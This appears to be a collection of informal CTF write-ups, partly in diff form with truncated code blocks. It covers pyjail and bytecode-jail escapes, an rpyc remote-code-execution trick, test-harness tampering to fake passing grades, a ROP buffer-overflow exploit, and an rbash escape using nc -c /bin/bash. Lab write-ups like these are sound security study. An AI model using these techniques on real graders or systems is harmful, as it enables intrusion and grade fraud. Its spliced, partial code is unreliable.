everyones just burnt out from organizing sapling lmao so im just looking at easy challs myself too
* * *
ngl this one is just reading MPI docs lmao
i didnt have mpirun set up, so i just ended up statically reversing the entire thing
which wasnt that bad actually theres only really 3 functions in question:
- first reads the flag as root process, scramble it, and then scatters it to the rest of the processes via `MPI_scatter`
- on first glance i thought the second one was just an artifical delay of some sorts since all it does it basically just sending and recving then syncing up, but on closer look they are swapping between processes
-
+
- third one gathers back the flag and checks it against the string as root process, and does nothing as other processes
so its just a matter of rewriting the program in python without all the interprocess communciation overheads then
except i kept brainfarting and somehow thought `#!py print("".join(['m_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3{Ptsu9i}13Es4V73M4_ans'[s[i]] for i in range(64)]))` would give me the correctly inversed flag if `s` is the scrambled index lmao
then i went on a rabbit hole figuring out where exactly i did the swapping wrong scrutinizing every single detail in the MPI docs and trying out like 4 different variations of my swapping from doing it in parallel to making a multidimensional array to ensure im not making arithmetic mistakes on the array indices
and then i finally gave up and used z3 which instantly spewed out the flag :clown:
eyo something familiar to me lets go?? ~~totally not something ive been doing to my own courses' autograders~~
except this one highkey is easier than the hurdles prairielearn and the likes brings me through tho lmao
we get arbitrary leaks just by returning the value (albeit truncated), and theres no restrictions on whatever imports we need
so logically the first thing to do is to traverse the stack since apparently all of these autograders basically runs in the same process for some reason lol
~~like interprocess communication and isolation between graders and runners wouldve been a much better design choice to prevent grade modifications but ok~~
-anyways it seems like most of the useful variables is in the second previous frame, so after a lot of `str(inspect.currentframe().f_back.f_back.f_globals.keys())[:64]`, `[64:128]`, `[128:192]`... to leak the data out by chunks to bypass the truncation i mentioned before i finally...
+anyways it seems like most of the useful variables is in the second previous frame, so after a lot of `str(inspect.currentframe().f_back.f_back.f_globals.keys())[:64]`, `[64:128]`, `[128:192]` etc etc to leak the data out by chunks to bypass the truncation i mentioned before i finally...
got fed up with the inefficiency :upside_down:
which funnily enough is also when i saw `_common_shorten_repr` which sounds suspiciously like its responsible for the truncation
and so nooping it i go: `#!py inspect.currentframe().f_back.f_back.f_globals['_common_shorten_repr'] = lambda *str: str`
originally i guessed `#!py lambda str: str`, but that ended up spewing arcane errors about format string having not enough parameters lmao so i just let made it vararg instead
and ey i was correct now we can leak things much faster than having to stitch together chunks after multiple runs
the next thing that caught my eyes is `TestCase` - this is just from the builtin `unittest` module aint it
for it to be here it probably means they are using it to run the tests, so what if we just make all the assertions on it succeed
and with the following code
```py
# TestCase is just python unittests, we can set assert* to True to pass all assertions
except a lot of the other test cases are still complaining about wrong format lmao so just nooping the assertions arent enough we need to noop the entire test case
after reading on how `TestCase` works for a bit i realized all test cases have to go through the `run` entrypoint
so what if we just noop that instead
turns out its slightly more complicated than just a `lambda res: None` lmao we need to get the actual test cases which subclasses `util.TestCase`, and also set the `TestResult` object to success
even tried to nudge rpyc to send the code to remote with no avail lol
```py
class metatest(type):
def __add__(self, b):
import subprocess
breakpoint() #if its local i will see instantly on my current terminal - just for ease of local debugging since cwd is same for server and client and its hard to tell
coz i thought what if they only accounted for normal usage of functions so cases like these would be tricked into calling the local versions of the objects instead of netrefs but no its not how it works
so since it seems like normal use cases wont be able to trigger code execution on remote its time to dig deep into the src
it turns out theres a netref class in `netref.py` that basically proxies all remote objects' functions back to remote through a few handlers in `protocol.py`
which means all local references execute on local since on remote they just become a netref so they just bounce back to run the code on local (and vice versa too - all remote references will stay in remote land, but we cant really access remote references since getattr is locked down)
since it seems like there aint much we can do with the netrefs themselves, i started digging deep into the protocol handlers, which all seemed pretty secure in the `DEFAULT_CONFIG` sense - until i found `HANDLE_CMP` which just called `#!py return getattr(type(obj), op)(obj, other)` for some reason
so i started thinking if theres any attr we can leak that will help us leak more which *also* has the property of accepting 2 parameters - and it turns out `__getattr__` does exactly that
except `__getattr__` actually just bounces everything back into local:
```py
def __getattr__(self, name):
if name in DELETED_ATTRS:
raise AttributeError()
return syncreq(self, consts.HANDLE_GETATTR, name)
```
BUT `__getattribute__` DOES get the local attributes specified in the `LOCAL_ATTRS` dict which includes most useful things like `__class__` and `__dict__`
now we can finally leak remote references that are not netrefs out into our client, which once we have them should allow us to stay in remote land
we still need to continue using this vulnerable `getattr` method instead of directly `obj.attr`ing which will use the secure `HANDLE_GETATTR` handler though, but the idea stays the same as most basic pyjails
with that, we can get arbitrary code execution on remote, and the flag: `dice{pyj41l_w1th_4_tw15t}`
```py
import rpyc
from rpyc.core import consts
#the idea is that once you get a remote reference, you can stay in remote land since all calls will be directed back to remote
#however getting that remote reference in the first place is quite annoying since most useful attributes are either blocked or local
#and theres not really a way to differentiate between those unless you dive into rpyc src
#also any local references (e.g. import os; os.system is a local reference that will end up running on our local machine; a local definition of a class with modified __add__ to trick remote to run will also not work since it will bounce back to local when we do conn.root.add())
#will end up bouncing back to local so the entrypoint has to be conn.root since that's the only remote reference at start
def remote_getattr(obj, name):
#abuses the fact that CMP is the only one that doesnt have a secure check but directly uses getattr
#also abuses the fact that __getattribute__ bypasses netref calls for certain local attrs so we dont bounce back to client
also unrelated: wsl port forward messed with my local/remote debug setup apparently lmao
and it seems like rpyc requires same (major?) version to run correctly? i was on 5.1.0 which just kept giving me connection closed by peer
this bug apparently is patched in the version i had in my python installation so im just glad i got stuck connecting to remote and downgraded to 4.1.0 before digging into the src lmao
or else i'd probably be malding over how theres no entrypoints for me to exploit at all kekw
+ngl this was kinda fun i get to use my niche pickling knowledge from kevin higgs revenge in gdg lmao
+
+~~though it ended up being me just dumping the code and not actually reversing the pickle anyway~~
+
+since we are given a blob thats very clearly a pickle coz of the `#!py __import__('pickle').loads`, ofc the first thing to do is to `#!py import pickletools; pickletools.dis` it
+
+and holy thats a huge pickle
+
+we can clearly see that the top part is a character mapping though which is utilized through `MEMOIZE` and `GET` and `#!py builtins.str.join`
+
+so with a bit of ~~scuffed~~ parsing we can extract the mapping:
+```py
+import pickletools, io, re
+
+data = io.StringIO()
+#blob omitted since its way too big to paste here
+pickletools.dis(blob, out=data)
+data = data.getvalue().split('\n')
+
+alph = ""
+for i, line in enumerate(data):
+ if 'MEMOIZE' in line and 'BINUNICODE' in data[i-1]:
+ alph += eval(data[i-1].split('BINUNICODE ')[1])
+
+print(alph.encode())
+```
+
+and with the mapping we can extract a lot of data on what is being called and whatnot ~~through another scuffed af parser~~:
+ elif 'REDUCE' in line and 'LIST' not in data[i-2] and 'GET' not in data[i-3]:
+ print('CALL ABOVE')
+ elif 'STACK_GLOBAL' in line:
+ print('GET OBJ')
+ elif 'BINBYTES' in line:
+ print('ARG BYTES')
+ else:
+ if currstr:
+ print(currstr)
+ currstr = ""
+```
+which tells roughly what strings should be treated as an object and whats being called on what
+
+looking at the strings in a stack based mindset and referring back to the pickle its not too hard to realize what the `BINBYTES` blobs inside the pickle are:
+which yields us one bytecode blob and one pickle blob, both perfectly disassemblable
+
+but looking at the disassemblies, we see another spam of things like:
+```text
+ 369: \x94 MEMOIZE (as 56)
+ 370: K BININT1 17
+ 372: K BININT1 3
+ 374: \x86 TUPLE2
+ 375: \x94 MEMOIZE (as 57)
+ 376: K BININT1 17
+ 378: K BININT1 9
+```
+and some bytecode that i didnt really wanna read through which also cant be decompiled since i dont have the data for co_names and all that yet
+
+if i really wanna make it decompilable, ill probably have to reverse the rest of the main pickle which seems to grab a reference of the code object class, instantiate it with a lot of weird stuff (namely just `snek`s everywhere), and setting that to `#!py pickle.encode_long.__code__`
+
+which i honestly wasnt too keen on making another parser for
+
+but its also at this point where i saw the single `BUILD` call, and i figured since they are calling the function here anyway why dont i just hook the `BUILD` opcode handler and just dump the fully built code object
+
+which is surprisingly straightforward if we copy the handler from src and call unpickler directly
+```py
+import pickle, importlib
+
+def load_build(self):
+ stack = self.stack
+ state = stack.pop()
+ with open('testsnek.pyc', 'wb') as w:
+ code = state[1]['__code__'].replace(co_varnames=tuple([v+str(i) for i,v in enumerate(state[1]['__code__'].co_varnames)]))
+(the `#!py [v+str(i) for i,v in enumerate(state[1]['__code__'].co_varnames)]` is for replacing the variables names which are all `snek` that somehow works in code objects (coz presumably the variable name parsing stage is by the compiler i guess) but is just hard to read during decomp)
+
+now that we got the pyc file, we can just run something like `pycdc testsnek.pyc`:
++ for (const auto& it : lhs.cast<PycSet>()->values()) {
++ result.push_back(new ASTObject(it));
++ }
++ }
++
++ } else {
++ //for tuples
++ for (const auto& it : lhs.cast<PycSet>()->values()) {
++ result.push_back(new ASTObject(it));
++ }
++ }
++
++ stack.push(new ASTList(result));
++ }
++ break;
+ case Pyc::LIST_EXTEND_A:
+ {
+ PycRef<ASTNode> rhs = stack.top();
+```
+and yes in case you are wondering i basically just copied the code from other opcode handlers coz all i need is for it to pass and create a good looking enough decomp lmao
+
+doesnt have to be accurate coz ill have to clean it up anyway
+ if snek17[0] < 0 and snek17[0] >= snek3 and snek17[1] < 0 or snek17[1] >= snek3:
+ print('snek dead :(')
+ return None
+ None.appendleft(snek17)
+ if snek17 in snek5[snek8]:
+ snek8 += 1
+ snek10.append(snek17)
+ if snek8 == len(snek5):
+ snek18 = 0
+ for snek19, snek20 in snek10:
+ snek18 ^= 1337
+ snek18 *= snek3 ** 2
+ snek18 += snek19 * snek3 + snek20
+ if snek4 == snek18:
+ print('snek happy :D')
+ print(open('flag.txt', 'r').read().strip())
+ return None
+ None('snek sad :(')
+ return None
+ snek6.pop()
+ elif snek15 == 'L':
+ snek7 = (-snek7[1], snek7[0])
+ elif snek15 == 'R':
+ snek7 = (snek7[1], -snek7[0])
+ else:
+ print('snek confused :(')
+ return None
+ None.sleep(0.1)
+else:
+ snek9.extend(input('snek? ').strip().split())
+continue
+```
+
+though its clear that my code didnt deal with frozensets as well as i hoped LMAO
+
+but then again we can see `snek5` has the same length as the frozensets list in `co_consts` so we can just sub it in
+
+along with fixing some clearly broken code like `#!py None.sleep(0.1)` and some renaming we finally can get a runnable decomp and a pretty good understanding on what its doing:
+which is now about as easy to understand as it gets for a rev chall:
+
+ - its a box standard snake game
+
+ - we move by specifying direction (`L` for counterclockwise, `R` for clockwise), and the amount of steps in that direction
+
+ - can specify infinite steps in a single input if needed
+
+ - we need to eat 10 fruits in total
+
+ - we need to eat the fruits in the order determined by `final`
+
+after brainfarting for actually way too long thinking i need to either z3 or bruteforce this and to no avail, i realized its literally trivially decomposable since its just storing data in chunks of `20^2`
+
+and i brainfarted *even more* by not realizing i was iterating in the wrong order so the positions i got was not matching up with the location of the fruits specified in `data`
+
+which made me so confused to the point where i was doubting my math skills yet again :upside_down:
+
+anyways with
+```py
+pos = []
+for i in range(10):
+ #in reversed order
+ if i: #the last one should not be xored
+ final ^= 1337
+ val = final % (20 ** 2)
+ y, x = (val // 20, val % 20)
+ pos.append((x, y))
+ if (y,x) not in data[9-i]:
+ print(x, y, 'off') #should not happen
+
+ final //= (20 ** 2)
+
+for p in pos[::-1]:
+ print(*p)
+```
+
+we can finally get the list of fruit coords we gotta eat in order to trigger the "special" ending that prints the flag
+
+```text
+x y
+0 11
+3 0
+18 8
+18 14
+11 17
+12 3
+10 19
+7 16
+15 16
+5 16
+```
+and since at this point i dont trust myself in coding anything anymore i just solved it ~~painfully~~ by hand routing the path and playing
+
+which yields us `9 L 1 R 2 R 1 R 8 R 3 L 3 R 8 R 7 L 1 R 3 L 6 L 2 R 1 R 6 R 1 7 L 3 1 L 2 L 6 R 2 L 9 L 3 2 L 16 R 3 R 3 R 4 L 1 R 4 R 1 1 R 8 R 1 L 3`
+
+and running it on remote finally yields us the flag after a lot of board printing:
+`lactf{h4h4_sn3k_g0_brrrrrrrr}`
+
+
+### pycjail
+
+ngl this one is just finding That One Trick:tm: in the cpython impl lmao
+
+that being said i havent really looked into the opcode implementations for cpython so it ended up taking a bit of time and trial and error still
+
+still feels easier than snek tho idk why this has so much less solves than that
+
+* * *
+
+since we are writing python instructions by hand i first tried a few normal things to get the hang of writing the bytecode
+
+like the args for each opcode and all that
+
+while trying that i got an idea tho and that is to invoke an exception which in a lot of higher level languages provide quite a bit of debug detail which is usually crucial to leaking info or getting data to nudge with
+
+like python tracebacks has frame info embedded in `tb_frame` which grants us access to globals and locals and all that
+
+while trying to set up try except frames i realized `RAISE_VARARGS` performing reraise (8200) is probably the easiest way to trigger an exception with the least amount of code
+
+and after looking a bit on how to set up try except frames in bytecode plugging in `7a01 8200 5300` really did return us something pretty useful: `<class 'RuntimeError'>`
+
+but thats probably not it, so to make it easy to check the stack i packed the last 3 vals on the interpreter stack into a tuple before returning with `7a01 8200 6603 5300`, and aha: `(<traceback object at 0x7f4b4f2c3340>, RuntimeError('No active exception to reraise'), <class 'RuntimeError'>)`
+
+since our goal is to somehow load attributes reading through some instructions thats not banned (all `LOAD`/`STORE`/`DELETE` are basically banned aside from `LOAD_CONSTS`), i locked onto the `MATCH_CLASS` method, which is recently added in 3.10, exactly the version the remote is running:
+
+> TOS is a tuple of keyword attribute names, TOS1 is the class being matched against, and TOS2 is the match subject. count is the number of positional sub-patterns.
+>
+> Pop TOS. If TOS2 is an instance of TOS1 and has the positional and keyword attributes required by count and TOS, set TOS to True and TOS1 to a tuple of extracted attributes. Otherwise, set TOS to False.
+>
+> *New in version 3.10.*
+
+
+which means it accepts a class and then an object to check for an attribute, and return that on success (along with a `True`/`False` indicator)
+
+wwwaaaaiiittt doesnt that fit exactly what we have on the stack after generating the exception? that means we can get arbitrary attributes from the exception class eyo
+
+and indeed that it does - with some nudging, we can get the following:
+```text
+consts: __setattr__
+names:
+code: 7a01 8200 6400 6601 9800 6603 5300
+here goes!
+(<traceback object at 0x7ff5c9d42c40>, (<method-wrapper '__setattr__' of RuntimeError object at 0x7ff5c9cdd080>,), True)
+```
+
+but now the problem comes - we can get anything from RuntimeError, and even set attributes on the object by duplicating them on the stack so we can refer to it after it gets consumed by `MATCH_CLASS`, but thats about as far as we can go since we cant really chain attribute gets:
+
+ - its not possible to obtain the class object of the attribute itself without getting the `__class__` attribute first which is a circular dependency,
+
+ - and we cant really obtain any useful objects to store into setattr outside of those reachable by calling the exception attributes or directly accessing them either anyways, which from all the exception classes i can invoke none provide any useful attributes i can use
+
+ - all methods we obtain are from the object not the class, and therefore bound to it so we cant just obtain a generic getattr for any objects (e.g. invoke `RuntimeError`'s `__getattribute__` on the traceback object) - see how it says `<method-wrapper>` not `<slot wrapper>`, ~~which itself is bound to all `BaseException` objects only so we cant apply it to most things anyway~~
+
+so after a lot of coping (why did it have to look so promising man :sob:) its time to go back to the drawing board
+
+ive always thought the way that they hardcoded `IMPORT_NAME` and not all the `IMPORT_.*` opcodes to be kinda suspicious, so i looked into that right after
+
+i first tried `IMPORT_STAR` and seeing if i can get it to load attributes from objects that arent modules, and it actually kinda worked, with the object popped and no errors - except it doesnt load it into the stack, and we cant do `LOAD_FAST` coz thats banned (and we cant write values to `co_varnames` anyway)
+
+so its time to check `IMPORT_FROM` - it seems like this one performs much more module related checks, but after quite a while of digging into the rabbit hole of functions that this opcode uses (and even had to debug cpython to figure out why it wasnt returning what i was expecting and opcodes dont give good error messages 90% of the time), i realized:
+
+ - `IMPORT_FROM` can actually import arbitrary modules as long as you fake a `__name__` in the object, which we can do by obtaining `__setattr__` through the `MATCH_CLASS` trick and then setting `__name__` to an arbitrary string we can load from `LOAD_CONST` (its the only data type we can enter into co_consts, which was surpringly helpful)
+
+ - however, it has to be already loaded before (aka in `sys.modules`), or else it fails (this is presumably due to the interpreter expecting `IMPORT_NAME` to be called before `IMPORT_FROM` like it normally does)
+
+ - the module name also has to be in the form of `<pkgname>.<name>` - theres no way to remove that dot since it is hardcoded regardless of whether you have an empty string or not
+
+and with the following (jail conformant, but for illustration purpose its in an interactive console instead) code we can verify that the above deductions are correct:
+<module 'importlib.util' from '/usr/lib/python3.10/importlib/util.py'>
+```
+
+unfortunately having a module object really doesnt do us much good since the good ol "no getattr and no LOAD_FAST" strikes again
+
+and we can already import module from plain ol objects arbitrarily so theres no point in getting a real module especially when we cant import actually useful ones like `sys`
+
+but this got me very confused since im definitely sure `from x import y` can import non module things too so i must be missing something
+
+and missing something i definitely did :facepalm::
+```c
+ if (_PyObject_LookupAttr(v, name, &x) != 0) {
+ return x;
+ }
+```
+this is literally the first thing in the handler which checks if the attribute exists in the object and instantly returns it if so *without checking anything module related*
+
+which means its literally a `getattr` in disguise lmao i didnt have to find such a convoluted way to load a module when i can just chain attributes
+
+~~which is honestly sad coz this payload is pretty cool ngl~~
+
+from here on out its just a normal pyjail with some length restrictions which isnt a problem since we can easily RCE with `#!py traceback.tb_frame.f_builtins['exec']('breakpoint()')` (exec needed since breakpoint doesnt behave well on a broken stack like this apparently)
+hey at least i learnt quite a bit on how i can trick cpython to do things i want to if i have access to durect bytecode
+
+also it turns out setting `__code__` can break cpython in quite a lot of ways lmao with everything from `free(): invalid pointer` to `Segmentation fault` if you get a funny interpreter stack going
+
+the easiest one is to just exhaust the stack so that TOS doesnt even exist anymore
+
+i wonder if its possible to do some cpython pwning with that actually :thinking:
+
+~~also kinda sus that the flag aint `lactf` prefixed~~
+
+
+
+### a hacker's notes
+
+a few of my teammates were working on getting the disk image decrypted and extracting data out of it while i was working on pycjail, but then i got fed up with it and took a break to look at other ppls progress
+
+thats where i see ppl talking about joplin and i was like eyo joplin?? fancy seeing a niche software i use and have tinkered with in a ctf
+
+ppl saw weird flag like strings in the db through `strings` but couldnt find where it is at, so i just opened it in sqlite explorer and looked through until i see it in `notes_fts_segdir`
+
+im pretty sure thats unintended since its a part of the full text search mechanism (and its all in lower case compared to the actual flag we get later on anyway)
+
+so i just looked for another route while my teammates are working on figuring out how the words match up to a flag
+
+i remember a class that handled all encryption stuff in joplin which was pretty nice to use back when i tinkered with the src so i tried looking for it
+
+and yep `EncryptionService` is right there and we can instantiate separate instances to add master keys and all that to decrypt stuff since we have both the encrypted string in the `encrypted_notes` dir and also the master key and master password in the `settings` table in the db
+
+i was gonna run it on my actual joplin instance but i figured thats probably not the best idea lmao i dont wanna screw up my own notes sync
+
+so i just spun up a portable instance and just threw the code into it
+
+and ey flag ez `lactf{S3cUr3_yOUR_C4cH3D_3nCRYP71On_P422woRD2}`
+spotted the out of bounds access pretty early while messing around with unmatching text and placeholder lengths which allows us to directly buffer overflow since no canary
+
+but that only gives us ret overwrite at 0x48 and theres nothing in the binary that can give us ez RCE
+
+and theres also no obvious leaks that we can use in the code either since we cant make a c++ string that is shorter than what is printed
+
+so it means we probably have to ret for a leak and then go back to main again to do the actual RCE
+
+so i tried looking for something that can do the equivalent of `printf` without all the c++ fluff and preferrably just straight up jumpable without much setup for me but alas pwn never is this straightforward
+
+so crafting rop it is i guess
+
+after finding the cout that actually works with a c string and a disgusting chain that was actually pretty straightforward to write we finally get a leak and a return to main that didnt crash
+
+somehow the "enter some text" prompt gets skipped as an empty string tho but that doesnt matter coz i was using empty strings for text anyway
+
+anyway with `one_gadget` it was more straightforward to get a shell than to leak the libc lmao
+
+but yea after a brief scare due to connection issues theres the flag `lactf{1_l0v3_c++_L2zuBdqJABGU}`
+p.sendafter('Enter the index of the stuff to redact: ', b'0')
+
+p.interactive()
+```
+
+this chall made me realize when i give up on pwn challs its mostly coz i dont wanna do all the work setting up the env not that i dont know what to do lmao
+
+like this chall is honestly pretty straightforward yet im still annoyed by the fact that i gotta do non trivial setup
+
+i honestly should do more pwn to train up speed tbh pwn is really fun anyway
aside from first word that the calc pushes onto the interactive console - which must be alphabets
interactive console can retrieve values using `_` - sth i learnt while watching jason use it for radare and binja lol coz i never use interactive console
all thats left is to find a way to unwrap dicts into lists which the * list unpacking operator works excellently
which performs exactly the bit flipping said in the chall desc lol
well then all thats left is to map which bits to flip and thats it for the first part
second part is figuring out that the loop reads null terminator while the length check reads c++ string length integer instead so theres a mismatch if we send them null bytes before hitting a line feed which makes the second part solvable
(below is for second part but first part can be mapped in the same way)
```py
#get a comparison for checking the bits to flip
print([c + " " + bin(ord(c)) for c in '1000 USD'])
print([c + " " + bin(ord(c)) for c in '9999 BTC'])
p.sendline('EEEMEPEUEXFCFFFRFTFUFVGBGCGDGJGKGL\0\0') #for loop loops until null terminator, but c++ length checks whole string until \n which finishes getline
p.interactive()
```
(this is easily doable automatically but i was aiming for first blood so i manually did them all lol)
### flag hoarder
open core, see program argument is `/home/knox/Downloads/a.out ./flag.txt.bz2 ./password.txt`
extract part of elf using `info proc mapping` -> `dump memory core.bin, 0x555555554000, 0x55555555FFF` (0x555555556000 is unreadable)
decompile whatevers decompilable, realize its opening files in argument and xoring something and pretty much not doing anything else
strings core file for `password`, see the very secret password, assume its the password we need and xor it according to guessing from decompilation
get bamboozled by the line feed and wonder why bz2 is dying until i opened the dump in hex editor and saw the 0A right after the password
add it and tada
solve script:
```py
import bz2
pw = b'this is my very secret password mwahahaha\n'
pwnlib safeeval checks opcode, which means i gotta learn pyc bytecodes
was testing what makefunction and loadfunction does, since thats the only thing they added for this chall to an otherwise proven fortified implementation
then i realized lambda can smuggle data
```py
import dis
c = compile("lambda x: ().__classes__.__subclasses__()", '<string>', 'eval')
#thus we can break safeeval jail using this since lambda smuggles code
originally assigned lambda then called it, but that triggers `LOAD_NAME` which aint allowed
but we can call it directly after defining
whew flag
### rbash warmup
since rbash only restricts command use, doesnt restrict arguments, use netcat to exec bash
local nc needed since host cannot communicate with outside services at all
so make 2 ncs and background both then foreground the listener to interact with bash
```sh
nc -v -l -n 127.0.0.1 -p 1337 &
nc 127.0.0.1 1337 -c /bin/bash &
fg 1
```
### internprise encryption
i translated it to z3 script without realizing its unicode based and unicode is variable length lol so `rb` wouldnt work
once [@Arctic](https://maplebacon.org/authors/rctcwyvrn/) pointed that out to [@kever](https://maplebacon.org/authors/vEvergarden/) i solved it with z3 after dealing with extra signed bits
hey first z3 solve i guess
```py
from z3 import *
s = []
sol = Solver()
with open('flag.txt', 'r', encoding='utf-8') as enc:
ef = enc.read()
for i in range(len(ef)):
s += [BitVec('c' + str(i), 8)]
x = SRem((s[i] + i * 0xf), 0x80)
#print(simplify(x))
x += SRem(BitVecVal(ord(ef[i - 0x1]), 8), 128) if i > 0x0 else 0xd
#print(simplify(x))
x = SignExt(4, x) ^ 0x555
#print(simplify(x))
x = ((x ^ ~0x0)) & 0xff
#print(simplify(x))
x = ~(Extract(8, 0, x ^ 0x3))
#print(simplify(BV2Int(x, is_signed=True)))
x = ((x >> 0x1f) + x) ^ (x >> 0x1f)
#print(simplify(BV2Int(x, is_signed=True)))
#ef += [Extract(9, 0, x)]
sol.add(x == ord(ef[i]))
print(sol.check())
print(sol.unsat_core())
model = sol.model()
#print([simplify(BV2Int(x, is_signed=True)) for x in ef])
print('wtf' + str(model))
print("".join([chr(model[var].as_long() & 0b01111111) for var in s]))